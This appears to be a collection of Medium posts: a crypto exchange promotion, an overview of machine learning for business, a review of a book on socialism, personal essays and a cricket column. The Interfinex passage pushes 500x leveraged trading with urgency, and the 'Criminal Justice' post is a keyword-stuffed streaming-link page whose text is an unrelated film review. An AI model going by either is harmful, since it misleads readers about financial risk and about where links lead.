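REFERRAL_DISCOUNT = 0.51  # 51% discount when a referral is provided

def trade_fee(amount, referred=False):
    """Fee in the same units as `amount`; 0.001 * (1 - 0.51) = 0.00049,
    i.e. the 0.049% discounted rate mentioned in the text."""
    rate = BASE_FEE_RATE * (1 - REFERRAL_DISCOUNT) if referred else BASE_FEE_RATE
    return amount * rate

print(round(trade_fee(10_000), 2))                 # → 10.0 (0.1% of 10,000)
print(round(trade_fee(10_000, referred=True), 2))  # → 4.9  (0.049%)
```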
Recently, the Interfinex team introduced 500x leveraged margin trading on their platform. It is very simple to use: all that is required is to enter the amount and drag the slider to the leverage the user intends to use. Closing a position takes just a tap: the user taps the “Close long position” or “Close short position” button and the position is closed. Any profits will automatically be transferred to the user’s account.
As part of the token distribution, the team is introducing yield farming to support the pools on the platform. Now is the right time, as 30% of the supply will be distributed via yield farming over the next 6 months, and the clock is ticking. All that is necessary is to deposit some liquidity into one of the supported pools. After that, you will automatically start earning yield. The reward depends on the amount you deposit relative to the pool size.
The APR of your favorite pool is accessible via the blue card above or on the yield farming page as shown below:
Interfinex distribution strategies are listed below
30% of tokens will go to exchanges.
10% will be channeled towards marketing.
30% will be used as community incentives.
20% is allocated to team members.
The remaining 10% is reserved for the founders.
There are more to Interfinex and other details are obtainable via any of these links
#ETF #Ethereum #bitcoin #eth #uniswap #defi #gem #investing #altcoins #exchange #money #cryptocurrency #trading #investment #decentralized.
|
https://medium.com/@victorosibajo/interfinex-simple-and-innovative-way-to-swap-any-erc20-token-into-another-and-pay-a-negligible-3c49654566fd
|
['Victor Osibajo']
|
2020-12-06 22:40:53.269000+00:00
|
['Defi', 'Interfinex', 'Swap', 'Eth']
|
Make Machine Learning Work for Your Company: An Overview
|
“Machine learning” is hot. Apple is “building a machine learning system to rule them all.” YouTube uses machine learning to remove objectionable content, while telecom empires apply ML algorithms for predictive maintenance and improving network reliability. And, of course, there are plenty of TedTalks.
For all the hype around machine learning, it still seems like a distant and futuristic concept for many in their everyday work lives. However, this technology — which is defined as a computer learning from experience to improve at a task without explicit programming — can be implemented at your company today regardless of size or industry. The underlying thread of ML for business is the potential to help companies operate more efficiently and competitively.
To illustrate this potential, here’s a brief overview of applications:
Marketing
The discipline has always been a bit of an art, but machine learning can elevate your creative intuition with a strong scientific foundation. Marketers are already using machine learning to target the right audience at the best time, test different combinations of copy in real-time, and personalize landing pages with optimal product and pricing.
Human Resources
In the knowledge economy, finding and retaining the best employees is more important than ever. Fortunately, machine learning can help. Algorithms can be used to remove bias from the hiring process, rank resumes, and identify candidates similar to your most successful employees. It can create custom experiences that attract applicants, automate feedback throughout the hiring process, and even answer candidate questions in real-time. Post-hire, machine learning enables employers to identify which of their employees are most likely to turnover creating an opportunity to intervene. Here’s an interesting case study on how Blue Orange uses ML to solve problems across the hiring process.
Customer Service
You’ve probably already experienced machine learning applied to customer service — in the form of chatbots. While not all chatbots incorporate machine learning, the ones that do can identify when it’s appropriate to use specific responses, gather required information, and escalate to a human agent. Additionally, natural language processing helps human agents quickly find answers that are buried in heavy text. These applications fundamentally increase customer service speed and customer satisfaction.
Fraud Prevention and Detection
Increasingly sophisticated fraud attempts, aided and abetted by new technology, call for increasingly sophisticated fraud prevention and detection. Machine learning’s anomaly detection capabilities make it well suited not only for recognizing old patterns of fraudulent activity, but also detecting new types of activity as they emerge. The resulting reduction in chargeback levels is especially valuable for e-commerce businesses.
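As a toy illustration of the anomaly-detection idea (not any vendor's method), the sketch below flags a transaction whose amount sits far outside a customer's historical spending. Production fraud systems use far richer features and models:

```python
from statistics import mean, stdev

def fit(history):
    """Learn a customer's 'normal' spend from past transaction amounts."""
    return mean(history), stdev(history)

def is_anomalous(amount, mu, sigma, threshold=3.0):
    """Flag amounts more than `threshold` standard deviations from the mean."""
    return sigma > 0 and abs(amount - mu) / sigma > threshold

history = [25, 30, 27, 22, 31, 28, 26, 24, 29, 26]  # typical card spend
mu, sigma = fit(history)
print(is_anomalous(28, mu, sigma))    # → False (ordinary purchase)
print(is_anomalous(5000, mu, sigma))  # → True  (flag for review)
```

Because the detector scores any new amount against learned behavior rather than a fixed blocklist, it can flag activity it has never seen before, which is the property the paragraph above describes.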
Cyber Security
Likewise, the constant evolution of cyber-attacks renders machine learning an important tool for cyber defense. Because it does not rely on past attack data as much as conventional approaches, machine learning is able to keep pace with hackers and more accurately predict cyber threats. Additionally, the sheer volume of cyber attacks makes machine learning an important tool for managing staffing expenses.
In Summary
Machine learning is already an indispensable tool for many industries. If ML is the future of business, then the future is here.
Here’s a helpful framework for understanding machine learning: https://blueorange.digital/machine-learning-an-introduction/
If you want to dig in on specific applications for your business, feel free to reach out to us today.
|
https://medium.com/@BlueOrangeDigital/make-machine-learning-work-for-your-company-an-overview-bf98d2764a07
|
['Blue Orange Digital']
|
2020-02-07 14:12:27.474000+00:00
|
['Predictive Analytics', 'Data Engineering', 'Data Science', 'Cybersecurity', 'Machine Learning']
|
Mostly Useful, a Bit Misleading: A Review of Nathan Robinson’s Why You Should Be a Socialist
|
First published online at NyJournalofbooks.com here.
There are only a few introductory texts on socialism that manage to be accessible, witty, and broad enough to survey its history as well as contemporary thought on the subject. Nathan J. Robinson’s new book, Why You Should Be a Socialist, is able to do just that by weaving together a compelling narrative and excellent arguments that cover the rich practical and theoretical implications of socialism in a down to earth, entertaining way. There are serious holes in the book’s content with regards to theory, however, as well as a reluctance to demonstrate if contemporary “democratic socialism” is up to the task of revolution. On the whole, the text provides many convincing arguments to win over skeptical progressives, centrists, and even conservative readers who perhaps have never deeply considered the case for socialism.
Robinson begins the book by addressing the fundamental impulses that socialists share: revulsion at gross inequalities and inhumane conditions that are the direct consequences of our dominant socio-economic system, capitalism. This is where Robinson’s work truly shines. He is able to clearly show how socialist, or at least anti-capitalist, thought is permeated by the notion that mainstream politics and finance are anything but normal with regard to human decency and meeting basic needs. What socialism contends, and what Robinson easily and deftly spells out, is that our economic system is not simply unfair or “the way things have to be”. Rather, capitalist institutions are set up to perpetuate systemic injustices including mass poverty, institutional racism, and imperial wars and foreign conflicts.
Part One of the book (Chapters one through three) dives into the failures of capitalism in detail, and the author cites many common studies and figures which bolster the arguments for socialism. What Robinson hits on over and over, to his credit, is to explain how completely arbitrary and cruel contemporary capitalism is. It is important to note that socialist thinking does not have to come from theoretical teachings or ideology. Instead, innate curiosity and what Robinson calls a “moral instinct” provides the natural tendency which grounds socialist thought. Here we can see clear articulations as to how and why capital relies on human immiseration for continual self-expansion, and how it chooses profits over people time and time again. This section does have convincing arguments to persuade open-minded liberals and skeptics.
Part Two dives into defining principles and terms associated with the left tradition, as well as expanding on modern utopian ideals and pragmatic agendas that socialists of today advocate for. At its core, socialism is about expanding democratic values and empowering workers, and Robinson’s analysis reflects this. Yet he seems to continually pepper his own belief system with common qualifiers such as “libertarian socialist” and “democratic socialist.” Robinson also errs by unduly misrepresenting Marx and Lenin, even throwing in a baseless quote from Murray Bookchin about Marx as if to prove his point. A few pages later, Robinson is quick to cite Helen Keller’s importance to American socialism, and rightly so; yet this reviewer is left to wonder if he is aware that Keller repeatedly praised Lenin throughout her life.
Part Three demolishes the usual conservative and liberal arguments and opposition to socialism. It’s quite an entertaining read and Robinson deftly dismisses both the intellectual bankruptcy of conservatism and the inadequate wishy-washiness of liberal thought. The section “Response to Criticisms” also does a good job explaining the bad faith mainstream critics use in lame attempts to discredit socialist thought. There is one notable exception, however, in which the author seriously errs in his attempt to bolster his argument by relying on discredited propaganda.
Robinson tries to explain how the capitalists’ talking point: “if you want socialism you’ll end up with Venezuela” is an absolute canard. Capitalists love to point to economic hardships in the developing world as being caused by socialism no matter what, obviously.
What’s bewildering, however, is the author’s insistence that Venezuela cannot be an example of socialist failure because in fact Venezuela does not have socialist policies. Amazingly, Robinson repeats mainstream lies and distortions, and attributes the crisis almost solely to internal “poor economic policies”, “authoritarian government”, and a “corrupt kleptocracy”. This is an uneducated viewpoint, one that does not take into account the worldwide drop in oil prices which hurt the spending power of the government; the sanctions, covert action, and economic sabotage from the US; and purposeful withholding of household goods and supplies by Venezuelan corporations and oligarchs who support the US-backed opposition. This is a prime example of what some humorously refer to as “State Department Socialism”, and was cringe-inducing to read. There are only three types of people who cite the Wall Street Journal and the Washington Post as credible sources on Venezuela: the educated fool, the sycophantic quisling, or the total sociopath; and Robinson appears to fall into the first category in this instance.
As founder and editor of Current Affairs, the leftist/progressive website and magazine, Robinson’s ideas are passed around the admittedly tiny socialist community and this book cannot be disentangled from his wider media footprint. Current Affairs does have some good content for socialists and younger “baby leftists”, and poses itself as more down-to-earth and irreverent compared to venues like Dissent or Jacobin.
Robinson is even maligned online, perhaps a bit unfairly, for his (possibly?) affected accent and his fashion sense; in his book he correctly identifies these sorts of criticisms as liberal tendencies. In his section on the inadequacy of liberals, he describes the way a “politics of attributes” is invoked, which is a good way of summing up the superficiality of liberal identity politics and woke political correctness. The ranks of lefties and socialists have a long, proud tradition of being filled with eccentrics, after all.
More to the point, valid critiques of this work as well as the wider milieu of Current Affairs and the above mentioned outlets focus around immature and indecisive ideology and policy proposals. Robinson’s own brand of libertarian socialism in the book is never really developed or expanded upon, and he does not bother to delve in and explain how he reconciles his own beliefs with democratic socialism. His passing references to Marx are, frankly, embarrassing, as even Jacobin’s review noted. The paucity of references to leftist movements internationally and in developing nations is a problem. The criticisms of Venezuela are unfounded; he attempts to attack from the left but uses mainstream arguments and sources from the Wall Street Journal, for crying out loud.
This book reflects a lot of tendencies of younger democratic socialists and millennial left politics. It’s immature, brilliant, clumsy, utopian, sentimental, geeky in an endearing way, out of touch, starry-eyed, short on history. It’s at turns sprawling and ambitious; it’s also characteristically insular and, again, mostly bereft of historical materialism and internationalist influences. Like the wider projects of the Democratic Socialists of America (DSA), Robinson’s own work elides the issue of his own privilege and how it is being leveraged to network and strengthen the “pragmatic” opportunism of socialists and social democrats trying to work within the inherently corrupt Democratic Party.
The text does exhibit some elements of salesmanship that can be at different points irritating or likeable, with a witty joke here, a silly pop culture reference there. In spite of the laid-back prose, there is a sort of striving, overachieving tone. It does appear that the author wants to be seen as a very serious person: see Current Affairs’ interviews with very important people, rock stars of US “progressivism” such as Noam Chomsky, Ilhan Omar, and Naomi Klein, but no one, well, too subversive. The bio on the book jacket (“Robinson is a leading voice of millennial left politics”) even mimics Jacobin’s byline: “Jacobin is a leading voice of the American left.” For those being introduced to leftist thinking, the book does a good job explaining some of the moral and practical reasons in favor of socialism. Those already steeped in theory and practice will find much familiar ground covered, as well as having to deal with the frustration of imprecise and immature reasoning from a self-proclaimed “leading voice.”
|
https://medium.com/politics-fast-and-slow/mostly-useful-a-bit-misleading-a-review-of-nathan-robinsons-why-you-should-be-a-socialist-9505087b579b
|
['William Hawes']
|
2020-07-11 17:08:44.190000+00:00
|
['Politics', 'Socialism', 'Communism', 'Culture', 'Government']
|
Blog of the month at ENVIE Magazine
|
I am happy to announce that Aisha’s Writing Corner has been selected as the Blog of the Month in Envie! magazine 🥳
I am greatly honored that my blog was featured. You can find my interview with the lovely Anna Page in the November issue at enviemagazine.com. You can subscribe to the great newsletter for free. It features up-and-coming indie authors and their works.
When I started my blog, early this year, I had no idea that it would reach this far and that I would have so many lovely followers. Thank you for reading my blog posts. I hope to write more about art, movies, animations and books that are inspiring. I hope that you discover something new from my blog posts.
Thank you for dropping by! 😊
|
https://medium.com/@aisha-urooj/blog-of-the-month-at-envie-magazine-5006c2a8d75c
|
['Aisha Urooj']
|
2020-12-20 22:38:24.487000+00:00
|
['Blogger', 'Blogging', 'Writing', 'Blog', 'Authors']
|
How to be Normal
|
How to be Normal
Considerations about the quest of a normal life
I once knew a woman whose highest aspiration was to be a normal person — at least, so she claimed.
Whenever someone uses the word “normal” in a conversation, I wonder what exactly they are trying to say. For a long time, I believed that others had a life manual that, for some reason, had not been delivered to me. One of the more substantial chapters of this manual should cover what is normal and what’s not.
— It means to be like everyone else. She said.
Here’s another generic concept: everyone else. It includes the Pope, the pusher in the neighborhood park, the victims of violence, the murderers, Donald Trump, Joe Biden, Kim Jong-un, Bill Gates, Gioacchino Difazio, the children forced to work, the stranger whose gaze we met in the subway, the beggar on the street corner, the astronaut in the space station, to list a few.
If being normal means having something in common with everyone else, it simply means belonging to humankind.
The aspiring “normal person” I am talking about was a colleague of mine until a few years ago. She had not made an in-depth analysis of her thinking on this theme. Her idea of normality consisted, as far as I knew, of being a passionate spectator of X-Factor, buying clothing and accessories online with reasonable frequency, sharing the lunch break always with the same people, and taking some trips to the toilets.
All in all, hers might seem a naive and harmless ambition…
Up close, nobody is normal
Franco Basaglia was a famous Italian psychiatrist who revolutionized the approach of psychiatric care.
One sentence sums up his thought: seen up close, nobody is normal.
No one can claim to have perfect mental health. Therefore, it made no sense to intern the mentally ill in asylums. Instead, it was necessary to reintegrate them into society through a path that put the person’s dignity first. Thanks to him, asylums in Italy were closed, and the mentally ill were no longer considered dangerous and irrecoverable beings to be imprisoned and punished.
Seen up close, nobody is normal. This was also true of my dear colleague, who, observed a little more closely, showed aspects that appeared not at all normal or innocuous.
She demonstrated an exceptional ability to gaslight people who had the misfortune of being between her and her goals. Is this normal behavior? Perhaps, for an a-hole.
Many people lost their jobs because of her.
Was she aware of it? Of course she was, but that was normal for her. There was this work to be done, and she was the one who had to do it. Those were her orders. Otherwise, she would have been the one to lose her job.
The trouble with Eichmann was precisely that so many were like him, and that the many were neither perverted nor sadistic, that they were, and still are, terribly and terrifyingly normal. From the viewpoint of our legal institutions and of our moral standards of judgment, this normality was much more terrifying than all the atrocities put together.
― Hannah Arendt, Eichmann in Jerusalem: A Report on the Banality of Evil
Normality can be dangerous
Attempting an accurate definition of normality would take me far beyond the scope of this article. By common sense, with a little help from statistics, we can consider normal a behavior that is carried out by the majority of people in a society. This is also known as “conformism.”
Conformism is extremely helpful to certain categories of people:
- Advertisers design their campaigns based on common beliefs and behaviors, thus being sure to hit the greatest possible number of people belonging to their target. Often advertisers contribute to broadening the concept of normality to increase the chances of selling a product.
- Politicians (ok, some politicians) build their consensus on the concept of normality. Some politicians (the worst) point the finger at those they consider “different” to strengthen their voters' sense of belonging to a community.
- Dictators and tyrants decide what is normal and what is not. From Hitler down, unfortunately, there is no lack of examples.
- Big Pharma: some diseases are more “normal” than others. Knowing that a condition is widespread makes it very convenient to produce (and sell) a cure. Conversely, rare diseases are those that generally have fewer dedicated drugs.
- TV show producers need the largest possible audience to sell advertising, product placements, and sponsorships at a high price. Which audience is larger than the ocean of ordinary people?
- Employers: being normal is expensive. Normal people need a job to lead a normal life, paying a normal mortgage for a normal house, getting into debt for a normal car, and creating a normal future for their children. And in the meantime, maybe, help the employer get rid of unwanted (abnormal, for any reason) employees.
You can complete this list.
As you can see, there are many vultures up there in the sky circling the heads of the so-called normal people.
Without normal people, these creatures would die of starvation.
The point is: uncritically following what is considered normal puts you in a weak position.
Wanting a normal life means accepting a definition of normality imposed from the outside. You don’t control it, you adhere. Everybody does it, so I do it too.
You delegate your thought to an abstract entity, which does not exist: everybody.
Unfortunately, in doing so, you give up a part of yourself. A significant part. Perhaps the most important. Perhaps so important that we could say: you give up on yourself.
Giving up on yourself, what happiness do you think you can aspire to? Perhaps the same kind of happiness that can be found in drugs or alcohol. But in this case, no one will try to save you, because you are sinking into normal happiness.
Perhaps it’s now clearer (even to myself) why I’m terrified by people who call themselves “normal.”
Being normal is dangerous.
Normality and awareness
Yet a part of me believes that there is nothing wrong with living according to beliefs and behaviors shared by others.
Being part of a group makes us feel at home and gives us the necessary serenity to progress in other fields, such as art or music, or raise a family.
There is nothing wrong. Provided, however, that the choice is made with awareness.
Here, this is the magic word: awareness.
One of the most precious gifts I have had from life was precisely this: the realization (at some point) that most people who believe they are normal don’t really know what they are talking about.
And this is also true for my monstrously normal colleague. Whom I don't hate. Indeed, I have to thank her: the clash with her normality allowed me to embark on a new path, much richer in humanity and gratification.
I know I’m not saying anything new or particularly original. But I feel that if I hadn’t written these words, just today, I would have slipped into a dangerous apathy, which is the cradle of the worst normality.
I suspect I’m not the only one hoping to find a life-time user manual ready to use, but I thank the god of mail carriers for never having received it, as that forced me to write my own.
Write the manual
Every day I write a page of the user manual of my life. Sometimes I have to rewrite it the next day. Other times it works flawlessly for a long time.
I don’t know if it will be useful to anyone besides me. Maybe it could be an inspiration, as other people’s ideas are to me.
Discovering that the manual does not exist can be scary. This is why some take refuge in the hazy concept of normality that I have written about so far.
But if you start writing your manual with an act of true courage, I assure you that you will discover wonderful things about yourself and the world.
I hope you start this journey soon.
|
https://medium.com/gmeditations/how-to-be-normal-669b239fff71
|
['Gioacchino Difazio']
|
2020-11-12 08:35:23.972000+00:00
|
['Normal', 'Personal Development', 'Life Lessons', 'Personal Story', 'Normality']
|
Criminal Justice [S02E01] Series. 2 Episode. 1 — Stream.
|
Criminal Justice,Criminal Justice 2x1,Criminal Justice S2E1,Criminal Justice S2xE1,Criminal Justice 2x1,Criminal Justice S2E1,Criminal Justice Cast,Criminal Justice Prime Video,Criminal Justice Season 2,Criminal Justice Episode 1,Criminal Justice Watch Online, Criminal Justice Season 2 Episode 1, Watch Criminal Justice Season 2 Episode 1 Online,Criminal Justice Eps. 2, Criminal Justice Episode 1
Watch Criminal Justice Season 2 Episode 1 (Streaming) ☞ https://cutt.ly/dh1YueG
❖ ALL CATEGORY WATCHED ❖
An action story is similar to adventure, and the protagonist usually takes a risky turn, which leads to desperate scenarios (including explosions, fight scenes, daring escapes, etc.). Action and adventure are usually categorized together (sometimes even as “action-adventure”) because they have much in common, and many stories fall into both genres simultaneously (for instance, the James Bond series can be classified as both).
Continuing their survival through an age of zombie apocalypse as a makeshift family, Columbus (Jesse Eisenberg), Tallahassee (Woody Harrelson), Wichita (Emma Stone), and Little Rock (Abigail Breslin) have found their balance as a team, settling into the now-vacant White House to spend some safe quality time with one another as they figure out their next move. However, spending time at the presidential residence raises some uncertainty as Columbus proposes to Wichita, which freaks out the independent lone wolf, while Little Rock starts to feel the need to be on her own. The women suddenly decide to escape in the middle of the night, leaving the men concerned about Little Rock, who’s quickly joined by Berkley (Avan Jogia), a hitchhiking hippie on his way to a place called Babylon, a fortified commune that’s supposed to be a safe haven against the zombies of the land. Hitting the road to retrieve their loved ones, Tallahassee and Columbus meet Madison (Zoey Deutch), a dim-witted survivor who takes an immediate liking to Columbus, complicating his relationship with Wichita.
❖ ANALYZER GOOD / BAD ❖
To be honest, I didn’t catch Zombieland when it first got released (in theaters) back in 2009. Of course, the movie pre-dated a lot of the pop culture phenomenon of using zombies as the main antagonist (i.e. Game of Thrones, The Maze Runner trilogy, The Walking Dead, World War Z, The Last of Us, etc.), but I’ve never been as keen on the whole “zombie” craze as others are. So, despite the comedy talents on the project, I didn’t see Zombieland… until it came to TV a year or so later. Surprisingly, however, I did like it. Naturally, the zombie apocalypse thing was fine (just wasn’t my thing), but I really enjoyed the film’s humor-based comedy throughout much of the feature. With the exception of 2004’s Shaun of the Dead, the majority of the past (and future) endeavors in this narrative have always been serious, so it was kind of refreshing to see comedic levity brought into the mix. Plus, the film’s cast was great, with the four main leads being one of the film’s greatest assets. As mentioned above, Zombieland didn’t make much of a huge splash at the box office, but certainly gained a strong cult following, including myself, in the following years.
Flash forward a decade after its release and Zombieland finally got a sequel with Zombieland: Double Tap, the central focus of this review post. Given how the original film ended, it was clear that a sequel to the 2009 movie was indeed possible, but it seemed like it was in no rush as the years kept passing by. So, I was quite surprised to hear that Zombieland was getting a sequel, but also a bit unsurprised, as Hollywood’s recent endeavors have been of the “belated sequels” variety, finding mixed results on each of these projects. I did see the film’s movie trailer, which definitely was what I was looking for in this Zombieland 2 movie, with Eisenberg, Harrelson, Stone, and Breslin returning to reprise their respective characters again. I knew I wasn’t expecting anything drastically different from the 2009 movie, so I entered Double Tap with a good frame of mind, somewhat eagerly expecting to catch up with this dysfunctional zombie-killing family. Unfortunately, while I did see the movie a week after its release, my review for it fell to the wayside as my life in retail got a hold of me during the holidays, as well as being sick for a good week and a half after seeing the movie. So, with me still playing “catch up,” I finally have the time to share my opinions on Zombieland: Double Tap. And what are they? Well, to be honest, my opinions on the film were good. Despite some problems here and there, Zombieland: Double Tap is definitely a fun sequel that’s worth the decade-long wait. It doesn’t “redefine” the zombie genre or outmatch its predecessor, but this next chapter of Zombieland still provides an entertaining entry… and that’s all that matters.
Returning to the director’s chair is director Ruben Fleischer, who helmed the first Zombieland movie as well as other film projects such as 30 Minutes or Less, Gangster Squad, and Venom. Thus, given his previous experience shaping the first film, it seems quite suitable (and obvious) for Fleischer to direct this movie, and (to that effect) Double Tap succeeds. Of course, with the first film being a “cult classic” of sorts, Fleischer probably knew that it wasn’t going to be easy to replicate the same formula in this sequel, especially with the ten-year gap between the films. Luckily, Fleischer certainly excels in bringing the same type of comedic nuances and cinematic aspects that made the first Zombieland enjoyable to Double Tap, creating a second installment that has plenty of fun and entertainment throughout. A lot of the familiar / likeable aspects of the first film, including the witty banter between the four main lead characters, continue to be at the forefront of this sequel, touching upon each character in an amusing way, with plenty of nods and winks to the original 2009 film that are done skillfully and not unnecessarily ham-fisted. Additionally, Fleischer keeps the film running at a brisk pace, with the feature having a runtime of 99 minutes (one hour and thirty-nine minutes), which means that the film never feels sluggish (even if it meanders through some secondary story beats / side plot threads), with Fleischer ensuring a companion sequel that leans on plenty of laughter and thrills presented in a snappy way (a sort of “thick and fast” notion). Speaking of which, the comedic aspect of the first Zombieland movie is well represented in Double Tap, with Fleischer still utilizing his cast (more on that below) in a smart and hilarious way by mixing comedic personalities / personas with something as serious and grave as fighting endless hordes of zombies everywhere they go.
Basically, if you were a fan of the first Zombieland flick, you’ll definitely find Double Tap to your liking.
In terms of production quality, Double Tap is a good feature. Granted, much like the last film, I knew that the overall setting and background layouts weren’t going to be elaborate and / or expansive. Thus, my opinion on this aspect of the movie’s technical presentation isn’t that critical. Taking that into account, Double Tap does (at least) have that standard “post-apocalyptic” setting of abandoned buildings, cityscapes, and roads throughout the feature, littered with unmanned vehicles and rubbish. It certainly has that “look and feel” of the post-zombie world, so Double Tap’s visual aesthetics get a solid industry standard in my book. Thus, a lot of the other areas that I usually mention (i.e. set decorations, costumes, cinematography, etc.) fit into that same category of meeting the standards for a 2019 movie. Thus, as a whole, the movie’s background nuances and presentation are good, but nothing grand, as I didn’t expect to be “wowed” by them. So, it sort of breaks even. This also extends to the film’s score, which was done by David Sardy, who provides a good musical composition for the feature’s various scenes as well as a musical song selection thrown into the mix, interjecting the various zombie and humor bits equally well.
There are some problems, a bit glaring, that Double Tap, while effectively fun and entertaining, can’t overcome, which hinders the film from overtaking its predecessor. Perhaps the most notable criticism is the narrative being told. Of course, the narrative in the first Zombieland wasn’t exactly the best, but it still combined zombie-killing action with the group dynamics between its lead characters. Double Tap, however, is fun but messy at the same time, creating a frustrating narrative that sounds good on paper but is thinly written when executed. Thus, the problem lies within the movie’s script, which was penned by Dave Callaham, Rhett Reese, and Paul Wernick, and which is a bit thinly sketched in certain areas of the story, including a side story involving Tallahassee wanting to head to Graceland, which involves some of the movie’s new supporting characters. It’s a fun sequence of events that follows, but it adds little to the main narrative and ultimately could’ve been cut completely. Thus, I kind of wanted to see Double Tap have more substance within its narrative. Heck, they even had a decade-long gap to come up with a new yarn to spin for this sequel… and it looks like they came up a bit shorter than expected.
Another point of criticism I have is that there aren’t enough zombie action bits compared to the first Zombieland movie. Much like what the Walking Dead series has become, Double Tap seems more focused on its characters (and the dynamics they share with each other) rather than on the group facing the sparse groupings of mindless zombies. However, that was some of the fun of the first movie, and Double Tap takes away that element. Yes, there are zombies in the movie and the gang is ready to take care of them (in gruesome fashion), but these mindless beings sort of take a back seat for much of the film, with the script and Fleischer more focused on showcasing witty banter between Columbus, Tallahassee, Wichita, and Little Rock. Of course, the climactic piece in the third act gives us the best zombie action scenes of the feature, but it feels a bit “too little, too late” in my opinion. To be honest, this big sequence is a little manufactured and not as fun and unique as the final battle scene in the first film. I know that sounds a bit contrived and weird, but, while the third-act big fight seems more polished and well staged, it also feels more restricted and doesn’t flow cohesively with the rest of the film (in a manner of speaking).
What certainly elevates these points of criticism is the film’s cast, with the main quartet of lead acting talents returning to reprise their roles in Double Tap, which is absolutely, hands down, the best part of this sequel. Naturally, I’m talking about the talents of Jesse Eisenberg, Woody Harrelson, Emma Stone, and Abigail Breslin in their respective Zombieland roles of Columbus, Tallahassee, Wichita, and Little Rock. Of the four, Harrelson, known for his roles in Cheers, True Detective, and War for the Planet of the Apes, shines the brightest in the movie, with Tallahassee’s dialogue lines proving to be the most hilarious comedy stuff in the sequel. Harrelson certainly knows how to lay it on “thick and fast” with the character, and the s**t he says in the movie is definitely funny (regardless of whether the joke is slightly dated). Behind him, Eisenberg, known for his roles in The Art of Self-Defense, The Social Network, and Batman v Superman: Dawn of Justice, is somewhere in the middle of the pack, but still continues to act as the main protagonist of the feature, including being a narrator for us (the viewers) in this post-zombie-apocalypse world. Of course, Eisenberg’s nervous voice and twitchy body movements certainly help make the character of Columbus likeable, and he does have a few comedic bits with each of his co-stars. Stone, known for her roles in The Help, Superbad, and La La Land, and Breslin, known for her roles in Signs, Little Miss Sunshine, and Definitely, Maybe, round out the quartet, providing the more grown-up / mature characters of the group, with Wichita and Little Rock trying to find their place in the world and deciding how to deal with some of the party members on a personal level. Collectively, these four are what made the first movie fun and hilarious, and their overall camaraderie / screen presence with each other hasn’t diminished in the decade-long absence.
To put it simply, these four were a riot in Zombieland and are again in Double Tap.
With the movie keeping the focus on the main quartet of lead Zombieland characters, the one newcomer who certainly takes the spotlight is actress Zoey Deutch, who plays the character of Madison, a dim-witted blonde who joins the group and takes a liking to Columbus. Known for her roles in Before I Fall, The Politician, and Set It Up, Deutch is somewhat of a “breath of fresh air,” acting as the tagalong member of the quartet in a humorous way. Though there isn’t much insight or depth to the character of Madison, Deutch’s ditzy / airhead portrayal of her is quite hilarious, and she is fun when making comments to Harrelson’s Tallahassee (again, he’s just a riot in the movie).
The rest of the cast, including actor Avan Jogia (Now Apocalypse and Shaft) as Berkeley, a pacifist hippie who quickly befriends Little Rock on her journey, actress Rosario Dawson (Rent and Sin City) as Nevada, the owner of an Elvis-themed motel whom Tallahassee quickly takes a shine to, and actors Luke Wilson (Legally Blonde and Old School) and Thomas Middleditch (Silicon Valley and Captain Underpants: The First Epic Movie) as Albuquerque and Flagstaff, two traveling zombie-killing partners who are mirror reflections of Tallahassee and Columbus, appear in minor supporting roles in Double Tap. While all of these acting talents are good and definitely bring a certain humorous quality to their characters, the characters themselves could’ve easily been expanded upon, with many being just thinly written caricatures. Of course, the movie focuses heavily on the Zombieland quartet (and newcomer Madison), but I wish these characters could’ve been fleshed out a bit.
Lastly, be sure to stick around for the film’s ending credits, with Double Tap offering up two Easter egg scenes (one mid-credits and one post-credits). While I won’t spoil them, I do have to mention that they are pretty hilarious.
❖ FINAL THOUGHTS ❖
It’s been a while, but the Zombieland gang is back and ready to hit the road once again in the movie Zombieland: Double Tap. Director Ruben Fleischer’s latest film sees the return of the dysfunctional zombie-killing makeshift family of survivors for another round of bickering, bantering, and trying to find their way in a post-apocalyptic world. While the movie’s narrative is a bit messy and could’ve been refined in the storyboarding process, as well as having a bit more zombie action, the rest of the feature proves to be a fun endeavor, especially with Fleischer returning to direct the project, the snappy / witty banter amongst its characters, a breezy runtime, and the four returning lead acting talents. Personally, I liked this movie. I definitely found it to my liking, as I laughed many times throughout, with the principal cast lending their screen presence to this post-apocalyptic zombie movie. Thus, my recommendation for this movie is a favorable “recommended,” as I’m sure it will please many fans of the first movie as well as the uninitiated (the film is quite easy to follow for newcomers). While the movie doesn’t redefine what was previously done back in 2009, Zombieland: Double Tap still provides a riot of laughs with this makeshift quartet of zombie survivors, giving us (the viewers) a fun and entertaining companion sequel to the original feature.
|
https://medium.com/criminal-justice-s02e01/criminal-justice-s02e01-series-2-episode-1-stream-75617ea830dd
|
['Nada Dahlia']
|
2020-12-23 17:52:54.878000+00:00
|
['Adventure', 'Crime', 'Mystery']
|
Guantes de nitrilo Disponible en stock
|
Eloquent Speaker and Cosponsor of When all Matters. Father of three and lover of sports.
|
https://medium.com/@veramehkomandoas/guantes-de-nitrilo-disponible-en-stock-d2285ba81a81
|
['Verameh Komandoas']
|
2020-12-25 00:49:58.992000+00:00
|
['Science', 'Business Development', 'Covid 19', 'Healthcare', 'Gloves']
|
Black Tuesday (Or, Musings on the Point of it All)
|
This is a nightmare you can’t wake from no matter how hard you try.
A mess. A disaster. A humiliation. A complete embarrassment.
At around ten to one in the morning, as most of us were drifting into the fitful alcohol-induced kip that marks this time of year as one of headaches and red-eye, Cameron Green of the Australian national cricket team castles James Anderson in Melbourne and Australia retain the Ashes after an England capitulation that took only eleven-and-a-bit days of test cricket to move from hope to abject humiliation.
Cue the lip-biting, brow-furrowing and face-wiping.
Joe Root is wheeled in front of the cameras and microphones. Right now, actually, he is not the dejected and broken cliché, but answering questions and going through the motions with the apathy of someone who is quite simply sick of it all. For weeks, chat from the England camp was one of corporate positivity. A misplaced upbeat-ism in the face of a potential looming disaster that can only be rivalled by the tone of the laughter overheard by the cleaning staff at 10 Downing Street, as they sweep up the crumbs of Jacob’s Cream Crackers and Wensleydale from the floor, and throw yet another empty bottle of Merlot into the recycling bin with just enough force to let out a hint of that building frustration.
Right now, though, Root is broken. He knows this is the career-ender. The series has been such a disaster it is the point of no recovery. Less a Battle of Thermopylae brave fight to the death, more surrendering to a couple of French fishing boats while fighting over the last remaining scallops in the English Channel.
